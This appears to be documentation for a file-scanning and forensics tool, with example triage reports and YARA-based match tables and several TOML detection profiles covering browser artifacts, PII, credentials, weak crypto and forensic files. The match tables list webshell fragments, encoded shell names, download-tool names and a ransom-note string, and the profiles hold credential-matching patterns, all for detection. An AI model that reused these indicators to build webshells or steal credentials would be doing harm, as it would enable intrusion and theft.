99	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Request Parameter	regex	request.getParameter(	17:24	21
100	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Request Parameter	regex	request.getParameter(	21:59	21
101	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Request Parameter	regex	request.getParameter(	25:26	21

signature_matches.csv

id	signature_name	sha256
1	Files with SQL and Parameter Access	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07
2	Files with SQL and Parameter Access	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146
3	Files with SQL and Parameter Access	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613
4	Files with SQL and Parameter Access	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec
5	Files with Multiple Security Issues	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613
6	Files with Multiple Security Issues	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146
7	Files with Multiple Security Issues	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec
8	Files with Multiple Security Issues	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	7368496e62dd8d28503c3814db65960af614fd1e	f3dfab8692c93a4e183662e5ec2b6f43	1244	text/plain	5.44631782671462
6716179e4ba5df26510403251df99b01c4fb98437e609bc6411982681662b20e	d97f38cb21b2c4b7c4ac8e6a8ba869a217e42e60	7b1bb4fb223bdeede54eb9365d5604f5	537	text/plain	5.1543776756198
63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	0ebd6dd0d2a74593975af8427b5932e3e0748643	5c3d56a8fa0294cfd04498374a6bded3	1526	text/x-script.python	5.29739365190587
22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	a2fa6a23d14dc32ff9eb45425066d2713a1f9d2d	9761a1a42f7f9ed8648ce1d95788acd9	1905	text/plain	5.06993651800799
b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	d3726f5382b1ff1e4ce4b84a08a995424e385fb0	2a81b315730471ecbd4531b174af1e85	1913	text/plain	5.09000925146894

Example: yara-rules

Inputs

examples/inputs/yara-rules-samples/suspicious_script.sh

Profile

# YARA Rules Example Profile
# Demonstrates YARA-X rule integration for malware detection

decode = ["base64"]

max-file-size = 52428800  # 50 MiB

tag = "yara-rules"

# Point to YARA rules directory
yara-x-rules = ["examples/inputs/yara-rules"]

# Additional string patterns to complement YARA
[[patterns]]
  name = "Suspicious String - cmd.exe"
  pattern = "cmd.exe"
  type = "string"
  case-insensitive = true

[[patterns]]
  name = "Suspicious String - powershell.exe"
  pattern = "powershell.exe"
  type = "string"
  case-insensitive = true

Report outputs

Triage report (converted from triage_report.json)

total_files	1
critical_count	0
high_count	0
medium_count	1
low_count	0
minimal_count	0
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:44.085498440+00:00

top_scores

characteristics_score	file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
0	Script	20	False	/suspicious_script.sh	20	33	17	["33 suspicious patterns detected"]	Medium	57	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_symbolic_link	is_extracted_file	is_decoded_file	is_deobfuscated_file	tag
/suspicious_script.sh	suspicious_script.sh	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	2025-12-03T08:56:20.497889219Z	2025-12-03T08:56:20.497889219Z	2025-12-03T08:56:20.497889219Z	["text/x-shellscript"]	0	0	0	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$cmd1	yara-text	cmd.exe	78	7
2	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$cmd1	yara-text	cmd.exe	553	7
3	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$cmd2	yara-text	powershell	96	10
4	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$cmd2	yara-text	powershell	527	10
5	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$cmd3	yara-text	/bin/bash	2	9
6	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$cmd3	yara-text	/bin/bash	154	9
7	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$cmd3	yara-text	/bin/bash	578	9
8	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$cmd4	yara-text	/bin/sh	172	7
9	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$net1	yara-text	wget	214	5
10	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$net2	yara-text	curl	246	5
11	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$net3	yara-text	Invoke-WebRequest	281	17
12	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$exec1	yara-text	Runtime.getRuntime().exec	366	25
13	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$exec2	yara-text	os.system(	400	10
14	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Suspicious_Strings:$exec3	yara-text	subprocess.call	420	15
15	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Base64_Encoded_Commands:$b64_powershell	yara-text	cG93ZXJzaGVsbA	511	14
16	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Base64_Encoded_Commands:$b64_powershell	yara-text	cG93ZXJzaGVsbA	595	14
17	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Base64_Encoded_Commands:$b64_cmd	yara-text	Y21kLmV4ZQ	541	10
18	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Base64_Encoded_Commands:$b64_cmd	yara-text	Y21kLmV4ZQ	619	10
19	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Base64_Encoded_Commands:$b64_bash	yara-text	L2Jpbi9iYXNo	564	12
20	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Base64_Encoded_Commands:$b64_bash	yara-text	L2Jpbi9iYXNo	639	12
21	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Webshell_Indicators:$php1	yara-text	eval($_	674	7
22	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Webshell_Indicators:$php3	yara-text	system($_	694	9
23	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Webshell_Indicators:$php4	yara-text	shell_exec($_	715	13
24	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Webshell_Indicators:$jsp1	yara-text	Runtime.getRuntime()	366	20
25	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Webshell_Indicators:$jsp1	yara-text	Runtime.getRuntime()	745	20
26	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Webshell_Indicators:$jsp2	yara-text	getParameter	767	12
27	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Crypto_Indicators:$btc	yara-regex	1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2	871	34
28	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Crypto_Indicators:$ransom1	yara-text	Your files have been encrypted	918	30
29	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Crypto_Indicators:$ransom2	yara-text	bitcoin	829	7
30	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Crypto_Indicators:$ransom2	yara-text	bitcoin	955	7
31	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	default:Crypto_Indicators:$ransom3	yara-text	.onion	1002	6
32	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	Suspicious String - cmd.exe	string	cmd.exe	4:1	7
33	22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	Suspicious String - cmd.exe	string	cmd.exe	22:15	7

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
22f34b029656bf34edd14b2066a18e9a8e6b55702bc9584e68ba3f51eba3367a	fcf773783b2da616fde022c9b80c182e21f4e5e9	5fd08f61a5bece9ef172aa3f6e97c8fd	1018	text/x-shellscript	5.37685282015745

Profiles

This folder contains copies of the project's TOML profiles and generated per-profile pages for easy viewing in the docs.

Available profiles:

Profile: base/browser-artifacts.toml

Source

Original path: profiles/base/browser-artifacts.toml

Profile (TOML)

# Browser Artifacts Profile
# Inspired by KAPE browser modules - detects browser history, cookies, and user activity

decode = ["base64", "percent-encoding", "unicode-escape-sequences"]

# Chrome/Chromium Artifacts
[[patterns]]
  name = "Chrome History Database"
  pattern = "Chrome.*History"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Chrome Login Data"
  pattern = "Chrome.*Login Data"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Chrome Cookies"
  pattern = "Chrome.*Cookies"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Chrome Web Data"
  pattern = "Chrome.*Web Data"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Chrome Bookmarks"
  pattern = "Chrome.*Bookmarks"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Chrome Extensions"
  pattern = "Chrome.*Extensions"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Chrome Cache"
  pattern = "Chrome.*Cache"
  case-insensitive = true
  type = "regex"

# Firefox Artifacts
[[patterns]]
  name = "Firefox Places"
  pattern = "places\\.sqlite"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Firefox Cookies"
  pattern = "cookies\\.sqlite"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Firefox Downloads"
  pattern = "downloads\\.sqlite"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Firefox Logins"
  pattern = "logins\\.json|key[34]\\.db"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Firefox Bookmarks"
  pattern = "bookmarkbackups"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Firefox Cache"
  pattern = "cache2|startupCache"
  case-insensitive = true
  type = "regex"

# Edge Artifacts
[[patterns]]
  name = "Edge History"
  pattern = "Edge.*History"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Edge Cookies"
  pattern = "Edge.*Cookies"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Edge WebCache"
  pattern = "WebCacheV"
  case-insensitive = true
  type = "regex"

# Internet Explorer Artifacts
[[patterns]]
  name = "IE History"
  pattern = "WebCacheV\\d+\\.dat"
  type = "regex"

[[patterns]]
  name = "IE Index.dat"
  pattern = "index\\.dat"
  case-insensitive = true
  type = "regex"

# Safari Artifacts
[[patterns]]
  name = "Safari History"
  pattern = "Safari.*History\\.db"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Safari Cookies"
  pattern = "Safari.*Cookies"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Safari Cache"
  pattern = "Safari.*Cache\\.db"
  case-insensitive = true
  type = "regex"

# Browser Session and Download Patterns
[[patterns]]
  name = "Download URL"
  pattern = "(?:download|dl).*(?:exe|zip|rar|7z|msi|dmg)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Visited URL"
  pattern = "(?:http|https|ftp)://[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

[[patterns]]
  name = "Search Query"
  pattern = "(?:q|query|search)=([^&]+)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Session Storage"
  pattern = "(?:sessionStorage|localStorage)"
  type = "regex"

# Browser Extension and Plugin Artifacts
[[patterns]]
  name = "Browser Extension ID"
  pattern = "[a-z]{32}"
  type = "regex"

[[patterns]]
  name = "Flash Cookie"
  pattern = "\\.sol$"
  type = "regex"

# Form and Password Artifacts
[[patterns]]
  name = "Saved Password"
  pattern = "(?:password_value|encryptedPassword)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Form Autofill"
  pattern = "(?:autofill|formhistory)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Credit Card Data"
  pattern = "credit_cards|payment_methods"
  case-insensitive = true
  type = "regex"

# Incognito/Private Browsing Indicators
[[patterns]]
  name = "Private Browsing"
  pattern = "(?:incognito|private.*brows|InPrivate)"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Browser Profile Activity"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as browser_artifacts FROM pattern_matches WHERE pattern_name LIKE '%Chrome%' OR pattern_name LIKE '%Firefox%' OR pattern_name LIKE '%Edge%' OR pattern_name LIKE '%Safari%' GROUP BY sha256 HAVING browser_artifacts > 3"

[[signatures]]
  name = "Sensitive Browser Data"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('Saved Password', 'Credit Card Data', 'Chrome Login Data', 'Firefox Logins')"

[[signatures]]
  name = "Download Activity"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name LIKE '%Download%'"

Profile: base/compliance.toml

Source

Original path: profiles/base/compliance.toml

Profile (TOML)

# Compliance Profile
# Detects PII and other regulated data for compliance scanning

decode = ["base64", "percent-encoding"]

[[patterns]]
  name = "Email Address"
  pattern = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

[[patterns]]
  name = "US Social Security Number"
  pattern = "\\b\\d{3}-\\d{2}-\\d{4}\\b"
  type = "regex"

[[patterns]]
  name = "US Social Security Number (No Dashes)"
  pattern = "\\b\\d{9}\\b"
  type = "regex"

[[patterns]]
  name = "Credit Card Number (Visa)"
  pattern = "\\b4\\d{3}[\\s-]?\\d{4}[\\s-]?\\d{4}[\\s-]?\\d{4}\\b"
  type = "regex"

[[patterns]]
  name = "Credit Card Number (MasterCard)"
  pattern = "\\b5[1-5]\\d{2}[\\s-]?\\d{4}[\\s-]?\\d{4}[\\s-]?\\d{4}\\b"
  type = "regex"

[[patterns]]
  name = "Credit Card Number (Amex)"
  pattern = "\\b3[47]\\d{2}[\\s-]?\\d{6}[\\s-]?\\d{5}\\b"
  type = "regex"

[[patterns]]
  name = "Credit Card Number (Discover)"
  pattern = "\\b6011[\\s-]?\\d{4}[\\s-]?\\d{4}[\\s-]?\\d{4}\\b"
  type = "regex"

[[patterns]]
  name = "Credit Card Number (Generic)"
  pattern = "\\b\\d{4}[\\s-]?\\d{4}[\\s-]?\\d{4}[\\s-]?\\d{4}\\b"
  type = "regex"

[[patterns]]
  name = "UK National Insurance Number"
  pattern = "(?:[A-CEGHJ-PR-TW-Z][A-CEGHJ-NPR-TW-Z])(?:\\s*\\d\\s*){6}([A-D]|\\s)"
  type = "regex"

[[patterns]]
  name = "Canadian SIN"
  pattern = "\\b\\d{3}-\\d{3}-\\d{3}\\b"
  type = "regex"

[[patterns]]
  name = "Phone Number (US)"
  pattern = "(?:\\+1[\\s-]?)?\\(?\\d{3}\\)?[\\s.-]?\\d{3}[\\s.-]?\\d{4}"
  type = "regex"

[[patterns]]
  name = "Phone Number (International)"
  pattern = "\\+\\d{1,3}[\\s.-]?\\(?\\d{1,4}\\)?[\\s.-]?\\d{1,4}[\\s.-]?\\d{1,9}"
  type = "regex"

[[patterns]]
  name = "IP Address (IPv4)"
  pattern = "\\b(?:\\d{1,3}\\.){3}\\d{1,3}\\b"
  type = "regex"

[[patterns]]
  name = "IP Address (IPv6)"
  pattern = "(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}"
  type = "regex"

[[patterns]]
  name = "MAC Address"
  pattern = "(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}"
  type = "regex"

[[patterns]]
  name = "US Passport Number"
  pattern = "\\b[0-9]{9}\\b"
  type = "regex"

[[patterns]]
  name = "IBAN"
  pattern = "[A-Z]{2}\\d{2}[A-Z0-9]{4}\\d{7}(?:[A-Z0-9]{0,16})?"
  type = "regex"

[[patterns]]
  name = "Date of Birth"
  pattern = "(?:dob|birth(?:day|date)|born)\\s*[:=]?\\s*(?:\\d{1,2}[/-]\\d{1,2}[/-]\\d{2,4}|\\d{4}[/-]\\d{1,2}[/-]\\d{1,2})"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Driver License"
  pattern = "(?:driver[\\s']?license|DL)\\s*[:=#]?\\s*[A-Z0-9]{5,20}"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Medical Record Number"
  pattern = "(?:mrn|medical.?record)\\s*[:=#]?\\s*\\d{5,10}"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Health Insurance Number"
  pattern = "(?:health.?insurance|policy)\\s*[:=#]?\\s*[A-Z0-9]{5,20}"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Files with Multiple PII Types"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as pii_types FROM pattern_matches WHERE pattern_name LIKE '%Number%' OR pattern_name LIKE '%Address%' OR pattern_name LIKE '%Insurance%' GROUP BY sha256 HAVING pii_types > 2"

[[signatures]]
  name = "Files with Email and Phone"
  query = "SELECT sha256 FROM pattern_matches WHERE pattern_name = 'Email Address' INTERSECT SELECT sha256 FROM pattern_matches WHERE pattern_name LIKE '%Phone%'"

Profile: base/credentials.toml

Source

Original path: profiles/base/credentials.toml

Profile (TOML)

# Credentials Detection Profile
# Detects common credential patterns including API keys, passwords, tokens, etc.

decode = ["base64", "hex", "percent-encoding"]

[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "AWS Secret Key"
  pattern = "(?:aws_secret_access_key|aws.secret.key)\\s*[:=]\\s*[\"']?([A-Za-z0-9/+=]{40})[\"']?"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Generic API Key"
  pattern = "(?:api[_-]?key|apikey)\\s*[:=]\\s*[\"']?([A-Za-z0-9_\\-]{20,})[\"']?"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Generic Secret"
  pattern = "(?:secret|token)\\s*[:=]\\s*[\"']?([A-Za-z0-9_\\-]{20,})[\"']?"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Password Assignment"
  pattern = "(?:password|passwd|pwd)\\s*[:=]\\s*[\"']?([^\\s\"']{3,})[\"']?"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Private Key Header"
  pattern = "-----BEGIN (?:RSA |DSA |EC |OPENSSH |ENCRYPTED )?PRIVATE KEY-----"
  type = "string"

[[patterns]]
  name = "SSH Private Key"
  pattern = "-----BEGIN OPENSSH PRIVATE KEY-----"
  type = "string"

[[patterns]]
  name = "PGP Private Key"
  pattern = "-----BEGIN PGP PRIVATE KEY BLOCK-----"
  type = "string"

[[patterns]]
  name = "GitHub Token"
  pattern = "ghp_[A-Za-z0-9_]{36}"
  type = "regex"

[[patterns]]
  name = "GitHub OAuth Token"
  pattern = "gho_[A-Za-z0-9_]{36}"
  type = "regex"

[[patterns]]
  name = "GitHub App Token"
  pattern = "(?:ghu|ghs)_[A-Za-z0-9_]{36}"
  type = "regex"

[[patterns]]
  name = "Slack Token"
  pattern = "xox[baprs]-[0-9]{10,13}-[0-9]{10,13}-[A-Za-z0-9]{24,32}"
  type = "regex"

[[patterns]]
  name = "Slack Webhook"
  pattern = "https://hooks\\.slack\\.com/services/T[A-Z0-9]+/B[A-Z0-9]+/[A-Za-z0-9]+"
  type = "regex"

[[patterns]]
  name = "Google API Key"
  pattern = "AIza[0-9A-Za-z_\\-]{35}"
  type = "regex"

[[patterns]]
  name = "Google OAuth"
  pattern = "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"
  type = "regex"

[[patterns]]
  name = "Heroku API Key"
  pattern = "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
  type = "regex"

[[patterns]]
  name = "MailChimp API Key"
  pattern = "[0-9a-f]{32}-us[0-9]{1,2}"
  type = "regex"

[[patterns]]
  name = "Stripe API Key"
  pattern = "(?:r|s)k_(?:live|test)_[0-9a-zA-Z]{24,}"
  type = "regex"

[[patterns]]
  name = "SSH Public Key"
  pattern = "ssh-(?:rsa|dss|ed25519|ecdsa)\\s+[A-Za-z0-9+/=]+"
  type = "regex"

[[patterns]]
  name = "Bearer Token"
  pattern = "Bearer\\s+[A-Za-z0-9_\\-\\.=]+"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Basic Auth"
  pattern = "Basic\\s+[A-Za-z0-9+/=]+"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Connection String"
  pattern = "(?:Server|Data Source|Host)\\s*=\\s*[^;]+;.*(?:Password|Pwd)\\s*=\\s*[^;]+"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "JWT Token"
  pattern = "eyJ[A-Za-z0-9_-]{10,}\\.[A-Za-z0-9_-]{10,}\\.[A-Za-z0-9_-]{10,}"
  type = "regex"

[[signatures]]
  name = "Files with Multiple Credentials"
  query = "SELECT sha256, COUNT(*) as credential_count FROM pattern_matches WHERE pattern_name LIKE '%Key%' OR pattern_name LIKE '%Token%' OR pattern_name LIKE '%Password%' GROUP BY sha256 HAVING credential_count > 2"

Profile: base/crypto.toml

Source

Original path: profiles/base/crypto.toml

Profile (TOML)

# Cryptography Profile
# Detects cryptographic operations and weak crypto patterns

decode = ["base64", "hex"]

[[patterns]]
  name = "MD5 Hash Usage"
  pattern = "(?:MessageDigest\\.getInstance\\(\\s*[\"']MD5[\"']\\s*\\)|md5|MD5|hashlib\\.md5)"
  type = "regex"

[[patterns]]
  name = "SHA1 Hash Usage"
  pattern = "(?:MessageDigest\\.getInstance\\(\\s*[\"']SHA-?1[\"']\\s*\\)|sha1|SHA1|hashlib\\.sha1)"
  type = "regex"

[[patterns]]
  name = "SHA256 Hash Usage"
  pattern = "(?:MessageDigest\\.getInstance\\(\\s*[\"']SHA-?256[\"']\\s*\\)|sha256|SHA256|hashlib\\.sha256)"
  type = "regex"

[[patterns]]
  name = "AES Encryption"
  pattern = "(?:getInstance\\([\"']AES[\"']\\)|AES|Cipher\\.getInstance\\([\"']AES)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "DES Encryption (Weak)"
  pattern = "(?:getInstance\\([\"']DES[\"']\\)|\\bDES\\b|Cipher\\.getInstance\\([\"']DES)"
  type = "regex"

[[patterns]]
  name = "3DES Encryption"
  pattern = "(?:getInstance\\([\"']DESede[\"']\\)|3DES|TripleDES)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "RSA Encryption"
  pattern = "(?:getInstance\\([\"']RSA[\"']\\)|RSA|Cipher\\.getInstance\\([\"']RSA)"
  type = "regex"

[[patterns]]
  name = "SecretKeySpec"
  pattern = "new\\s+SecretKeySpec\\("
  type = "regex"

[[patterns]]
  name = "KeyGenerator"
  pattern = "KeyGenerator\\.getInstance\\("
  type = "regex"

[[patterns]]
  name = "Cipher getInstance"
  pattern = "Cipher\\.getInstance\\("
  type = "regex"

[[patterns]]
  name = "ECB Mode (Insecure)"
  pattern = "/ECB/"
  type = "string"

[[patterns]]
  name = "CBC Mode"
  pattern = "/CBC/"
  type = "string"

[[patterns]]
  name = "GCM Mode"
  pattern = "/GCM/"
  type = "string"

[[patterns]]
  name = "Random Number Generator"
  pattern = "(?:SecureRandom|Random|random\\.randint|Math\\.random)"
  type = "regex"

[[patterns]]
  name = "Hardcoded Encryption Key"
  pattern = "(?:key|secret)\\s*=\\s*[\"'][a-zA-Z0-9+/=]{16,}[\"']"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Hardcoded IV"
  pattern = "(?:iv|init.?vector)\\s*=\\s*[\"'][a-zA-Z0-9+/=]{16,}[\"']"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "PBKDF2"
  pattern = "PBKDF2|PBEKeySpec"
  type = "regex"

[[patterns]]
  name = "BCrypt"
  pattern = "bcrypt|BCrypt"
  type = "regex"

[[patterns]]
  name = "SCrypt"
  pattern = "scrypt|SCrypt"
  type = "regex"

[[patterns]]
  name = "Argon2"
  pattern = "argon2|Argon2"
  type = "regex"

[[patterns]]
  name = "Certificate File"
  pattern = "-----BEGIN CERTIFICATE-----"
  type = "string"

[[patterns]]
  name = "SSL Context"
  pattern = "SSLContext\\.getInstance\\("
  type = "regex"

[[patterns]]
  name = "TrustManager"
  pattern = "TrustManager|X509TrustManager"
  type = "regex"

[[patterns]]
  name = "Signature Verification"
  pattern = "Signature\\.getInstance\\("
  type = "regex"

[[signatures]]
  name = "Files Using Weak Crypto"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('MD5 Hash Usage', 'SHA1 Hash Usage', 'DES Encryption (Weak)', 'ECB Mode (Insecure)')"

[[signatures]]
  name = "Files with Hardcoded Crypto Keys"
  query = "SELECT sha256 FROM pattern_matches WHERE pattern_name LIKE 'Hardcoded%'"

Profile: base/forensics.toml

Source

Original path: profiles/base/forensics.toml

Profile (TOML)

# Forensic Artifacts Profile
# Inspired by KAPE and UAC - detects forensic artifacts and evidence of user activity

decode = ["base64", "hex", "percent-encoding"]

# Windows Forensic Artifacts
[[patterns]]
  name = "Windows Event Log"
  pattern = "\\.evtx?$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Prefetch File"
  pattern = "\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Registry Hive"
  pattern = "(?:NTUSER\\.DAT|SAM|SYSTEM|SOFTWARE|SECURITY|UsrClass\\.dat|NTUSER\\.DAT\\.LOG)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "ShimCache Reference"
  pattern = "AppCompatCache|ShimCache"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Amcache Reference"
  pattern = "Amcache\\.hve"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "SRUM Database"
  pattern = "SRUDB\\.dat"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Recent Files (LNK)"
  pattern = "\\.lnk$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Jump List"
  pattern = "(?:automaticDestinations|customDestinations)-ms$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Shellbags Reference"
  pattern = "BagMRU|Bags"
  type = "regex"

[[patterns]]
  name = "USN Journal"
  pattern = "\\$UsnJrnl|\\$J"
  type = "regex"

# Browser Artifacts
[[patterns]]
  name = "Browser History"
  pattern = "(?:History|WebCacheV|places\\.sqlite)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Browser Cookies"
  pattern = "(?:Cookies|cookies\\.sqlite)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Browser Cache"
  pattern = "(?:Cache|cache2|CacheStorage)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Browser Downloads"
  pattern = "downloads\\.sqlite|download.*history"
  case-insensitive = true
  type = "regex"

# Unix/Linux Forensic Artifacts
[[patterns]]
  name = "Bash History"
  pattern = "\\.bash_history"
  type = "string"

[[patterns]]
  name = "Auth Log"
  pattern = "/var/log/auth\\.log"
  type = "string"

[[patterns]]
  name = "Syslog"
  pattern = "/var/log/syslog"
  type = "string"

[[patterns]]
  name = "Wtmp/Utmp"
  pattern = "(?:/var/log/wtmp|/var/run/utmp|/var/log/btmp)"
  type = "regex"

[[patterns]]
  name = "Lastlog"
  pattern = "/var/log/lastlog"
  type = "string"

# Timestamps and Timeline Artifacts
[[patterns]]
  name = "MFT Record"
  pattern = "\\$MFT"
  type = "string"

[[patterns]]
  name = "Timestamp Pattern"
  pattern = "(?:Created|Modified|Accessed|Changed):\\s*\\d{4}-\\d{2}-\\d{2}"
  case-insensitive = true
  type = "regex"

# Memory and Process Artifacts
[[patterns]]
  name = "Memory Dump File"
  pattern = "\\.(?:dmp|vmem|raw|mem)$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Hibernation File"
  pattern = "hiberfil\\.sys"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Page File"
  pattern = "pagefile\\.sys|swapfile\\.sys"
  case-insensitive = true
  type = "regex"

